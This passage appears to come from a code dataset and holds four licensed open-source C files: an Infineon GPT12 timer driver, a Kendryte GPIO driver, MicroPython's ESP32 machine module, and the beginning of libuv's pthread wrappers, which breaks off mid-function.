filename
stringlengths
3
9
code
stringlengths
4
1.87M
332914.c
/** * \file IfxGpt12.c * \brief GPT12 basic functionality * * \version iLLD_1_0_1_11_0 * \copyright Copyright (c) 2019 Infineon Technologies AG. All rights reserved. * * * IMPORTANT NOTICE * * * Use of this file is subject to the terms of use agreed between (i) you or * the company in which ordinary course of business you are acting and (ii) * Infineon Technologies AG or its licensees. If and as long as no such * terms of use are agreed, use of this file is subject to following: * Boost Software License - Version 1.0 - August 17th, 2003 * Permission is hereby granted, free of charge, to any person or * organization obtaining a copy of the software and accompanying * documentation covered by this license (the "Software") to use, reproduce, * display, distribute, execute, and transmit the Software, and to prepare * derivative works of the Software, and to permit third-parties to whom the * Software is furnished to do so, all subject to the following: * The copyright notices in the Software and this entire statement, including * the above license grant, this restriction and the following disclaimer, must * be included in all copies of the Software, in whole or in part, and all * derivative works of the Software, unless such copies or derivative works are * solely in the form of machine-executable object code generated by a source * language processor. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT * SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE * FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER * DEALINGS IN THE SOFTWARE. * */ /******************************************************************************/ /*----------------------------------Includes----------------------------------*/ /******************************************************************************/ #include "IfxGpt12.h" /******************************************************************************/ /*-------------------------Function Implementations---------------------------*/ /******************************************************************************/ float32 IfxGpt12_T2_getFrequency(Ifx_GPT12 *gpt12) { float32 freq = IfxGpt12_getModuleFrequency(gpt12); IfxGpt12_Mode mode; IfxGpt12_TimerInputPrescaler prescaler; IfxGpt12_Gpt1BlockPrescaler bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1; switch (bps1) { case IfxGpt12_Gpt1BlockPrescaler_4: freq = freq / 4; break; case IfxGpt12_Gpt1BlockPrescaler_8: freq = freq / 8; break; case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break; default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */ freq = freq / 32; break; } mode = IfxGpt12_T2_getMode(gpt12); prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T2CON.B.T2I; if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer)) { freq = freq / (1 << prescaler); } else { freq = freq / 2; } return freq; } float32 IfxGpt12_T3_getFrequency(Ifx_GPT12 *gpt12) { float32 freq = IfxGpt12_getModuleFrequency(gpt12); IfxGpt12_Mode mode; IfxGpt12_TimerInputPrescaler prescaler; IfxGpt12_Gpt1BlockPrescaler bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1; switch (bps1) { case IfxGpt12_Gpt1BlockPrescaler_4: freq = freq / 4; break; case IfxGpt12_Gpt1BlockPrescaler_8: freq = freq / 8; break; case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break; default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */ freq = freq / 32; break; } mode = (IfxGpt12_Mode)gpt12->T3CON.B.T3M; prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T3CON.B.T3I; if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer)) { freq = freq / (1 << prescaler); } else { freq = freq / 2; } return freq; } float32 IfxGpt12_T4_getFrequency(Ifx_GPT12 *gpt12) { float32 freq = IfxGpt12_getModuleFrequency(gpt12); IfxGpt12_Mode mode; IfxGpt12_TimerInputPrescaler prescaler; IfxGpt12_Gpt1BlockPrescaler bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1; switch (bps1) { case IfxGpt12_Gpt1BlockPrescaler_4: freq = freq / 4; break; case IfxGpt12_Gpt1BlockPrescaler_8: freq = freq / 8; break; case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break; default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */ freq = freq / 32; break; } mode = (IfxGpt12_Mode)gpt12->T4CON.B.T4M; prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T4CON.B.T4I; if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer)) { freq = freq / (1 << prescaler); } else { freq = freq / 2; } return freq; } float32 IfxGpt12_T5_getFrequency(Ifx_GPT12 *gpt12) { float32 freq = IfxGpt12_getModuleFrequency(gpt12); IfxGpt12_Mode mode; IfxGpt12_TimerInputPrescaler prescaler; IfxGpt12_Gpt2BlockPrescaler bps2 = (IfxGpt12_Gpt2BlockPrescaler)gpt12->T6CON.B.BPS2; switch (bps2) { case IfxGpt12_Gpt2BlockPrescaler_2: freq = freq / 2; break; case IfxGpt12_Gpt2BlockPrescaler_4: freq = freq / 4; break; case IfxGpt12_Gpt2BlockPrescaler_8: freq = freq / 8; break; default: /* case IfxGpt12_Gpt2BlockPrescaler_16: */ freq = freq / 16; break; } mode = (IfxGpt12_Mode)gpt12->T5CON.B.T5M; prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T5CON.B.T5I; if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer)) { freq = freq / (1 << prescaler); } else { freq = freq / 2; } return freq; } float32 IfxGpt12_T6_getFrequency(Ifx_GPT12 *gpt12) { float32 freq = IfxGpt12_getModuleFrequency(gpt12); IfxGpt12_Mode mode; IfxGpt12_TimerInputPrescaler prescaler; IfxGpt12_Gpt2BlockPrescaler bps2 = (IfxGpt12_Gpt2BlockPrescaler)gpt12->T6CON.B.BPS2; switch (bps2) { case IfxGpt12_Gpt2BlockPrescaler_2: freq = freq / 2; break; case IfxGpt12_Gpt2BlockPrescaler_4: freq = freq / 4; break; case IfxGpt12_Gpt2BlockPrescaler_8: freq = freq / 8; break; default: /* case IfxGpt12_Gpt2BlockPrescaler_16: */ freq = freq / 16; break; } mode = (IfxGpt12_Mode)gpt12->T6CON.B.T6M; prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T6CON.B.T6I; if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer)) { freq = freq / (1 << prescaler); } else { freq = freq / 2; } return freq; } void IfxGpt12_disableModule(Ifx_GPT12 *gpt12) { uint16 psw = IfxScuWdt_getCpuWatchdogPassword(); IfxScuWdt_clearCpuEndinit(psw); gpt12->CLC.B.DISR = 1; IfxScuWdt_setCpuEndinit(psw); } void IfxGpt12_enableModule(Ifx_GPT12 *gpt12) { uint16 psw = IfxScuWdt_getCpuWatchdogPassword(); IfxScuWdt_clearCpuEndinit(psw); gpt12->CLC.B.DISR = 0; IfxScuWdt_setCpuEndinit(psw); } void IfxGpt12_initTxEudInPin(const IfxGpt12_TxEud_In *txEudIn, IfxPort_InputMode inputMode) { IfxPort_setPinModeInput(txEudIn->pin.port, txEudIn->pin.pinIndex, inputMode); switch (txEudIn->timer) { case 2: IfxGpt12_T2_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 3: IfxGpt12_T3_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 4: IfxGpt12_T4_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 5: IfxGpt12_T5_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 6: IfxGpt12_T6_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; default: break; } } void IfxGpt12_initTxEudInPinWithPadLevel(const IfxGpt12_TxEud_In *txEudIn, IfxPort_InputMode inputMode, IfxPort_PadDriver padDriver) { IfxPort_setPinModeInput(txEudIn->pin.port, txEudIn->pin.pinIndex, inputMode); IfxPort_setPinPadDriver(txEudIn->pin.port, txEudIn->pin.pinIndex, padDriver); switch (txEudIn->timer) { case 2: IfxGpt12_T2_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 3: IfxGpt12_T3_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 4: IfxGpt12_T4_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 5: IfxGpt12_T5_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; case 6: IfxGpt12_T6_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break; default: break; } } void IfxGpt12_initTxInPin(const IfxGpt12_TxIn_In *txIn, IfxPort_InputMode inputMode) { IfxPort_setPinModeInput(txIn->pin.port, txIn->pin.pinIndex, inputMode); switch (txIn->timer) { case 2: IfxGpt12_T2_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 3: IfxGpt12_T3_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 4: IfxGpt12_T4_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 5: IfxGpt12_T5_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 6: IfxGpt12_T6_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; default: break; } } void IfxGpt12_initTxInPinWithPadLevel(const IfxGpt12_TxIn_In *txIn, IfxPort_InputMode inputMode, IfxPort_PadDriver padDriver) { IfxPort_setPinModeInput(txIn->pin.port, txIn->pin.pinIndex, inputMode); IfxPort_setPinPadDriver(txIn->pin.port, txIn->pin.pinIndex, padDriver); switch (txIn->timer) { case 2: IfxGpt12_T2_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 3: IfxGpt12_T3_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 4: IfxGpt12_T4_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 5: IfxGpt12_T5_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; case 6: IfxGpt12_T6_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break; default: break; } } void IfxGpt12_resetModule(Ifx_GPT12 *gpt12) { uint16 passwd = IfxScuWdt_getCpuWatchdogPassword(); IfxScuWdt_clearCpuEndinit(passwd); gpt12->KRST0.B.RST = 1; /* Only if both Kernel reset bits are set a reset is executed */ gpt12->KRST1.B.RST = 1; IfxScuWdt_setCpuEndinit(passwd); while (0 == gpt12->KRST0.B.RSTSTAT) /* Wait until reset is executed */ {} IfxScuWdt_clearCpuEndinit(passwd); gpt12->KRSTCLR.B.CLR = 1; /* Clear Kernel reset status bit */ IfxScuWdt_setCpuEndinit(passwd); }
473093.c
/* Copyright 2018 Canaan Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <FreeRTOS.h> #include <driver.h> #include <fpioa.h> #include <gpio.h> #include <io.h> #include <semphr.h> #include <stdio.h> #include <sysctl.h> #define COMMON_ENTRY \ gpio_data *data = (gpio_data *)userdata; \ volatile gpio_t *gpio = (volatile gpio_t *)data->base_addr; \ configASSERT(pin < data->pin_count); \ (void)data; \ (void)gpio; typedef struct { uint32_t pin_count; uintptr_t base_addr; } gpio_data; static void gpio_install(void *userdata) { /* GPIO clock under APB0 clock, so enable APB0 clock firstly */ sysctl_clock_enable(SYSCTL_CLOCK_APB0); sysctl_clock_enable(SYSCTL_CLOCK_APB1); sysctl_clock_enable(SYSCTL_CLOCK_GPIO); } static int gpio_open(void *userdata) { return 1; } static void gpio_close(void *userdata) { } static void gpio_set_drive_mode(uint32_t pin, gpio_drive_mode_t mode, void *userdata) { COMMON_ENTRY; int io_number = fpioa_get_io_by_function(FUNC_GPIO0 + pin); configASSERT(io_number > 0); fpioa_pull_t pull = 0; uint32_t dir = 0; switch (mode) { case GPIO_DM_INPUT: pull = FPIOA_PULL_NONE; dir = 0; break; case GPIO_DM_INPUT_PULL_DOWN: pull = FPIOA_PULL_DOWN; dir = 0; break; case GPIO_DM_INPUT_PULL_UP: pull = FPIOA_PULL_UP; dir = 0; break; case GPIO_DM_OUTPUT: pull = FPIOA_PULL_DOWN; dir = 1; break; default: configASSERT(!"GPIO drive mode is not supported."); break; } fpioa_set_io_pull(io_number, pull); set_bit_idx(gpio->direction.u32, pin, dir); } static void gpio_set_pin_edge(uint32_t pin, gpio_pin_edge_t edge, void *userdata) { COMMON_ENTRY; configASSERT(!"Not supported."); } static void gpio_set_on_changed(uint32_t pin, gpio_on_changed_t callback, void *callback_data, void *userdata) { COMMON_ENTRY; configASSERT(!"Not supported."); } static gpio_pin_value_t gpio_get_pin_value(uint32_t pin, void *userdata) { COMMON_ENTRY; uint32_t dir = get_bit_idx(gpio->direction.u32, pin); volatile uint32_t* reg = dir ? gpio->data_output.u32 : gpio->data_input.u32; return get_bit_idx(reg, pin); } static void gpio_set_pin_value(uint32_t pin, gpio_pin_value_t value, void *userdata) { COMMON_ENTRY; uint32_t dir = get_bit_idx(gpio->direction.u32, pin); volatile uint32_t* reg = dir ? gpio->data_output.u32 : gpio->data_input.u32; configASSERT(dir == 1); set_bit_idx(reg, pin, value); } static gpio_data dev0_data = {8, GPIO_BASE_ADDR}; const gpio_driver_t g_gpio_driver_gpio0 = {{&dev0_data, gpio_install, gpio_open, gpio_close}, 8, gpio_set_drive_mode, gpio_set_pin_edge, gpio_set_on_changed, gpio_set_pin_value, gpio_get_pin_value};
829516.c
/* * This file is part of the MicroPython project, http://micropython.org/ * * Development of the code in this file was sponsored by Microbric Pty Ltd * * The MIT License (MIT) * * Copyright (c) 2013-2015 Damien P. George * Copyright (c) 2016 Paul Sokolovsky * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include <stdint.h> #include <stdio.h> #include "freertos/FreeRTOS.h" #include "freertos/task.h" #include "esp_sleep.h" #include "esp_pm.h" #include "driver/touch_pad.h" #if CONFIG_IDF_TARGET_ESP32 #include "esp32/rom/rtc.h" #include "esp32/clk.h" #elif CONFIG_IDF_TARGET_ESP32S2 #include "esp32s2/rom/rtc.h" #include "esp32s2/clk.h" #elif CONFIG_IDF_TARGET_ESP32S3 #include "esp32s3/rom/rtc.h" #include "esp32s3/clk.h" #endif #include "py/obj.h" #include "py/runtime.h" #include "lib/utils/pyexec.h" #include "extmod/machine_mem.h" #include "extmod/machine_signal.h" #include "extmod/machine_pulse.h" #include "extmod/machine_i2c.h" #include "extmod/machine_spi.h" #include "modmachine.h" #include "machine_rtc.h" #if MICROPY_PY_MACHINE typedef enum { MP_PWRON_RESET = 1, MP_HARD_RESET, MP_WDT_RESET, MP_DEEPSLEEP_RESET, MP_SOFT_RESET } reset_reason_t; STATIC bool is_soft_reset = 0; STATIC mp_obj_t machine_freq(size_t n_args, const mp_obj_t *args) { if (n_args == 0) { // get return mp_obj_new_int(esp_clk_cpu_freq()); } else { // set mp_int_t freq = mp_obj_get_int(args[0]) / 1000000; if (freq != 20 && freq != 40 && freq != 80 && freq != 160 && freq != 240) { mp_raise_ValueError(MP_ERROR_TEXT("frequency must be 20MHz, 40MHz, 80Mhz, 160MHz or 240MHz")); } #if CONFIG_IDF_TARGET_ESP32 esp_pm_config_esp32_t pm; #elif CONFIG_IDF_TARGET_ESP32S2 esp_pm_config_esp32s2_t pm; #endif pm.max_freq_mhz = freq; pm.min_freq_mhz = freq; pm.light_sleep_enable = false; esp_err_t ret = esp_pm_configure(&pm); if (ret != ESP_OK) { mp_raise_ValueError(NULL); } while (esp_clk_cpu_freq() != freq * 1000000) { vTaskDelay(1); } return mp_const_none; } } STATIC MP_DEFINE_CONST_FUN_OBJ_VAR_BETWEEN(machine_freq_obj, 0, 1, machine_freq); STATIC mp_obj_t machine_sleep_helper(wake_type_t wake_type, size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) { enum {ARG_sleep_ms}; const mp_arg_t allowed_args[] = { { MP_QSTR_sleep_ms, MP_ARG_INT, { .u_int = 0 } }, }; mp_arg_val_t args[MP_ARRAY_SIZE(allowed_args)]; mp_arg_parse_all(n_args, pos_args, kw_args, MP_ARRAY_SIZE(allowed_args), allowed_args, args); mp_int_t expiry = args[ARG_sleep_ms].u_int; if (expiry != 0) { esp_sleep_enable_timer_wakeup(((uint64_t)expiry) * 1000); } if (machine_rtc_config.ext0_pin != -1 && (machine_rtc_config.ext0_wake_types & wake_type)) { esp_sleep_enable_ext0_wakeup(machine_rtc_config.ext0_pin, machine_rtc_config.ext0_level ? 1 : 0); } if (machine_rtc_config.ext1_pins != 0) { esp_sleep_enable_ext1_wakeup( machine_rtc_config.ext1_pins, machine_rtc_config.ext1_level ? ESP_EXT1_WAKEUP_ANY_HIGH : ESP_EXT1_WAKEUP_ALL_LOW); } if (machine_rtc_config.wake_on_touch) { if (esp_sleep_enable_touchpad_wakeup() != ESP_OK) { mp_raise_msg(&mp_type_RuntimeError, MP_ERROR_TEXT("esp_sleep_enable_touchpad_wakeup() failed")); } } switch (wake_type) { case MACHINE_WAKE_SLEEP: esp_light_sleep_start(); break; case MACHINE_WAKE_DEEPSLEEP: esp_deep_sleep_start(); break; } return mp_const_none; } STATIC mp_obj_t machine_lightsleep(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) { return machine_sleep_helper(MACHINE_WAKE_SLEEP, n_args, pos_args, kw_args); }; STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_lightsleep_obj, 0, machine_lightsleep); STATIC mp_obj_t machine_deepsleep(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) { return machine_sleep_helper(MACHINE_WAKE_DEEPSLEEP, n_args, pos_args, kw_args); }; STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_deepsleep_obj, 0, machine_deepsleep); STATIC mp_obj_t machine_reset_cause(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) { if (is_soft_reset) { return MP_OBJ_NEW_SMALL_INT(MP_SOFT_RESET); } switch (esp_reset_reason()) { case ESP_RST_POWERON: case ESP_RST_BROWNOUT: return MP_OBJ_NEW_SMALL_INT(MP_PWRON_RESET); break; case ESP_RST_INT_WDT: case ESP_RST_TASK_WDT: case ESP_RST_WDT: return MP_OBJ_NEW_SMALL_INT(MP_WDT_RESET); break; case ESP_RST_DEEPSLEEP: return MP_OBJ_NEW_SMALL_INT(MP_DEEPSLEEP_RESET); break; case ESP_RST_SW: case ESP_RST_PANIC: case ESP_RST_EXT: // Comment in ESP-IDF: "For ESP32, ESP_RST_EXT is never returned" return MP_OBJ_NEW_SMALL_INT(MP_HARD_RESET); break; case ESP_RST_SDIO: case ESP_RST_UNKNOWN: default: return MP_OBJ_NEW_SMALL_INT(0); break; } } STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_reset_cause_obj, 0, machine_reset_cause); void machine_init(void) { is_soft_reset = 0; } void machine_deinit(void) { // we are doing a soft-reset so change the reset_cause is_soft_reset = 1; } STATIC mp_obj_t machine_wake_reason(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) { return MP_OBJ_NEW_SMALL_INT(esp_sleep_get_wakeup_cause()); } STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_wake_reason_obj, 0, machine_wake_reason); STATIC mp_obj_t machine_reset(void) { esp_restart(); return mp_const_none; } STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_reset_obj, machine_reset); STATIC mp_obj_t machine_soft_reset(void) { pyexec_system_exit = PYEXEC_FORCED_EXIT; mp_raise_type(&mp_type_SystemExit); } STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_soft_reset_obj, machine_soft_reset); STATIC mp_obj_t machine_unique_id(void) { uint8_t chipid[6]; esp_efuse_mac_get_default(chipid); return mp_obj_new_bytes(chipid, 6); } STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_unique_id_obj, machine_unique_id); STATIC mp_obj_t machine_idle(void) { taskYIELD(); return mp_const_none; } STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_idle_obj, machine_idle); STATIC mp_obj_t machine_disable_irq(void) { uint32_t state = MICROPY_BEGIN_ATOMIC_SECTION(); return mp_obj_new_int(state); } MP_DEFINE_CONST_FUN_OBJ_0(machine_disable_irq_obj, machine_disable_irq); STATIC mp_obj_t machine_enable_irq(mp_obj_t state_in) { uint32_t state = mp_obj_get_int(state_in); MICROPY_END_ATOMIC_SECTION(state); return mp_const_none; } MP_DEFINE_CONST_FUN_OBJ_1(machine_enable_irq_obj, machine_enable_irq); STATIC const mp_rom_map_elem_t machine_module_globals_table[] = { { MP_ROM_QSTR(MP_QSTR___name__), MP_ROM_QSTR(MP_QSTR_umachine) }, { MP_ROM_QSTR(MP_QSTR_mem8), MP_ROM_PTR(&machine_mem8_obj) }, { MP_ROM_QSTR(MP_QSTR_mem16), MP_ROM_PTR(&machine_mem16_obj) }, { MP_ROM_QSTR(MP_QSTR_mem32), MP_ROM_PTR(&machine_mem32_obj) }, { MP_ROM_QSTR(MP_QSTR_freq), MP_ROM_PTR(&machine_freq_obj) }, { MP_ROM_QSTR(MP_QSTR_reset), MP_ROM_PTR(&machine_reset_obj) }, { MP_ROM_QSTR(MP_QSTR_soft_reset), MP_ROM_PTR(&machine_soft_reset_obj) }, { MP_ROM_QSTR(MP_QSTR_unique_id), MP_ROM_PTR(&machine_unique_id_obj) }, { MP_ROM_QSTR(MP_QSTR_sleep), MP_ROM_PTR(&machine_lightsleep_obj) }, { MP_ROM_QSTR(MP_QSTR_lightsleep), MP_ROM_PTR(&machine_lightsleep_obj) }, { MP_ROM_QSTR(MP_QSTR_deepsleep), MP_ROM_PTR(&machine_deepsleep_obj) }, { MP_ROM_QSTR(MP_QSTR_idle), MP_ROM_PTR(&machine_idle_obj) }, { MP_ROM_QSTR(MP_QSTR_disable_irq), MP_ROM_PTR(&machine_disable_irq_obj) }, { MP_ROM_QSTR(MP_QSTR_enable_irq), MP_ROM_PTR(&machine_enable_irq_obj) }, { MP_ROM_QSTR(MP_QSTR_time_pulse_us), MP_ROM_PTR(&machine_time_pulse_us_obj) }, { MP_ROM_QSTR(MP_QSTR_Timer), MP_ROM_PTR(&machine_timer_type) }, { MP_ROM_QSTR(MP_QSTR_WDT), MP_ROM_PTR(&machine_wdt_type) }, #if MICROPY_HW_ENABLE_SDCARD { MP_ROM_QSTR(MP_QSTR_SDCard), MP_ROM_PTR(&machine_sdcard_type) }, #endif // wake abilities { MP_ROM_QSTR(MP_QSTR_SLEEP), MP_ROM_INT(MACHINE_WAKE_SLEEP) }, { MP_ROM_QSTR(MP_QSTR_DEEPSLEEP), MP_ROM_INT(MACHINE_WAKE_DEEPSLEEP) }, { MP_ROM_QSTR(MP_QSTR_Pin), MP_ROM_PTR(&machine_pin_type) }, { MP_ROM_QSTR(MP_QSTR_Signal), MP_ROM_PTR(&machine_signal_type) }, #if CONFIG_IDF_TARGET_ESP32 { MP_ROM_QSTR(MP_QSTR_TouchPad), MP_ROM_PTR(&machine_touchpad_type) }, #endif { MP_ROM_QSTR(MP_QSTR_ADC), MP_ROM_PTR(&machine_adc_type) }, { MP_ROM_QSTR(MP_QSTR_DAC), MP_ROM_PTR(&machine_dac_type) }, { MP_ROM_QSTR(MP_QSTR_I2C), MP_ROM_PTR(&machine_hw_i2c_type) }, { MP_ROM_QSTR(MP_QSTR_SoftI2C), MP_ROM_PTR(&mp_machine_soft_i2c_type) }, { MP_ROM_QSTR(MP_QSTR_I2S), MP_ROM_PTR(&machine_i2s_type) }, { MP_ROM_QSTR(MP_QSTR_PWM), MP_ROM_PTR(&machine_pwm_type) }, { MP_ROM_QSTR(MP_QSTR_RTC), MP_ROM_PTR(&machine_rtc_type) }, { MP_ROM_QSTR(MP_QSTR_SPI), MP_ROM_PTR(&machine_hw_spi_type) }, { MP_ROM_QSTR(MP_QSTR_SoftSPI), MP_ROM_PTR(&mp_machine_soft_spi_type) }, { MP_ROM_QSTR(MP_QSTR_UART), MP_ROM_PTR(&machine_uart_type) }, // Reset reasons { MP_ROM_QSTR(MP_QSTR_reset_cause), MP_ROM_PTR(&machine_reset_cause_obj) }, { MP_ROM_QSTR(MP_QSTR_HARD_RESET), MP_ROM_INT(MP_HARD_RESET) }, { MP_ROM_QSTR(MP_QSTR_PWRON_RESET), MP_ROM_INT(MP_PWRON_RESET) }, { MP_ROM_QSTR(MP_QSTR_WDT_RESET), MP_ROM_INT(MP_WDT_RESET) }, { MP_ROM_QSTR(MP_QSTR_DEEPSLEEP_RESET), MP_ROM_INT(MP_DEEPSLEEP_RESET) }, { MP_ROM_QSTR(MP_QSTR_SOFT_RESET), MP_ROM_INT(MP_SOFT_RESET) }, // Wake reasons { MP_ROM_QSTR(MP_QSTR_wake_reason), MP_ROM_PTR(&machine_wake_reason_obj) }, { MP_ROM_QSTR(MP_QSTR_PIN_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT0) }, { MP_ROM_QSTR(MP_QSTR_EXT0_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT0) }, { MP_ROM_QSTR(MP_QSTR_EXT1_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT1) }, { MP_ROM_QSTR(MP_QSTR_TIMER_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_TIMER) }, { MP_ROM_QSTR(MP_QSTR_TOUCHPAD_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_TOUCHPAD) }, { MP_ROM_QSTR(MP_QSTR_ULP_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_ULP) }, }; STATIC MP_DEFINE_CONST_DICT(machine_module_globals, machine_module_globals_table); const mp_obj_module_t mp_module_machine = { .base = { &mp_type_module }, .globals = (mp_obj_dict_t *)&machine_module_globals, }; #endif // MICROPY_PY_MACHINE
294123.c
/* Copyright Joyent, Inc. and other Node contributors. All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include "uv.h" #include "internal.h" #include <pthread.h> #include <assert.h> #include <errno.h> #include <sys/time.h> #undef NANOSEC #define NANOSEC ((uint64_t) 1e9) struct thread_ctx { void (*entry)(void* arg); void* arg; }; static void* uv__thread_start(void *arg) { struct thread_ctx *ctx_p; struct thread_ctx ctx; ctx_p = arg; ctx = *ctx_p; uv__free(ctx_p); ctx.entry(ctx.arg); return 0; } int uv_thread_create(uv_thread_t *tid, void (*entry)(void *arg), void *arg) { struct thread_ctx* ctx; int err; ctx = uv__malloc(sizeof(*ctx)); if (ctx == NULL) return UV_ENOMEM; ctx->entry = entry; ctx->arg = arg; err = pthread_create(tid, NULL, uv__thread_start, ctx); if (err) uv__free(ctx); return -err; } uv_thread_t uv_thread_self(void) { return pthread_self(); } int uv_thread_join(uv_thread_t *tid) { return -pthread_join(*tid, NULL); } int uv_thread_equal(const uv_thread_t* t1, const uv_thread_t* t2) { return pthread_equal(*t1, *t2); } int uv_mutex_init(uv_mutex_t* mutex) { #if defined(NDEBUG) || !defined(PTHREAD_MUTEX_ERRORCHECK) return -pthread_mutex_init(mutex, NULL); #else pthread_mutexattr_t attr; int err; if (pthread_mutexattr_init(&attr)) abort(); if (pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK)) abort(); err = pthread_mutex_init(mutex, &attr); if (pthread_mutexattr_destroy(&attr)) abort(); return -err; #endif } void uv_mutex_destroy(uv_mutex_t* mutex) { if 